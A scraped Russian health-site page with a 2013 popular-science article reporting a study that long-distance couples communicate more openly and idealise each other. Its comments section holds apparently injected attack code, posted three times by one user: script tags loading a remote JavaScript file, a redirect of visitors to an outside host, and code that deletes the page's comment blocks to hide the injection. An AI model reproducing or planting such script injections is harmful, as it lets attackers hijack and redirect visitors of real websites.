Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как далеко искать любовь?...  >>  Как далеко искать любовь? Ученые говорят, что отношения на расстоянии лучше обычных!
 
Обратная связь
 

Как далеко искать любовь? Ученые говорят, что отношения на расстоянии лучше обычных!

Размер шрифта
21 августа 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Отношения на расстоянии – испытание, с которым приходится сталкиваться многим молодым парам. Но так ли трагична удаленная любовь? Ученые выяснили, что на самом деле расстояние добавляет отношениям глубины и прочности.

Как далеко искать любовь? Ученые говорят, что отношения на расстоянии лучше обычных!

Трудно объективно оценить степень любви и привязанности, но ученые из Гонконгского и Корнельского университетов сделали это.

Исследование носило социологический характер. Ученые собрали влюбленные пары, часть из которых находились на большом расстоянии друг от друга. Сначала их опрашивали на предмет интенсивности каждодневного общения, как лицом к лицу, так и с помощью современных средств связи (телефонов, видео-чатов, электронной почты и других). Затем, неделю спустя, участники исследования рассказывали о том, насколько откровенными были эти разговоры, проявляли ли они искренность сами и чувствовали ли полную отдачу со стороны партнера.

Ученые пришли к парадоксальному выводу:  расстояние сближает людей! Объясняется это тем, что, во-первых, находясь в удалении друг от друга, человек охотнее открывается и делится сокровенным. А во-вторых, он идеализирует поведение партнера, не имея возможности наблюдать его воочию. Оба вышеописанных феномена особенно ярко проявляются при текстовом общении.

Данное исследование весьма актуально, поскольку в современном мире отношения на расстоянии становятся все более распространенным явлением. Развитие мобильной связи и интернета сделало границы более размытыми, а расстояния – менее ощутимыми. Сталкиваясь с необходимостью жить далеко друг от друга, люди, тем не менее, решают не расставаться. Скажем, в США порядка трех миллионов женатых (!) пар вынужденно живут не вместе. Если же рассматривать отношения между студентами, то цифра приобретает совсем другой, более впечатляющий масштаб: по разным оценкам, от 25 до 50% студентов поддерживают стабильный контакт с удаленным партнером. А это десятки миллионов людей!

Но с другой стороны, многие по-прежнему боятся подобных отношений. И этот страх заставляет их принимать тяжелые, болезненные решения.

«Действительно, наша культура рисует определенный шаблон идеальных отношений, в котором непоколебима роль прямого общения лицом к лицу», – говорит доктор Джиянь, один из ведущих научных сотрудников исследовательской группы. «Но практика показывает, что любовь на расстоянии ничуть не хуже, а скорее даже наоборот. Живя далеко друг от друга, люди прилагают больше усилий доя сохранения отношений, и эти усилия не проходят даром».

Поэтому отбросьте пессимизм и страх и любите друг друга вопреки всем километрам!

Результаты работы были опубликованы в Журнале Коммуникации (Journal of Communication).

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
1 зашел – 1 вышел! Как «дружат» люди в социальных сетях   Ваш смартфон спасет вас от слепоты   Ученые выяснили, что случится с вами, если вас удалят из друзей Вконтакте!   Ученые советуют материться!  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Самые неожиданные причины боли
Странные сигналы вашего организма
Как снова хотеть секса

Тесты

1
Вредит ли здоровью ваш мобильный?
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.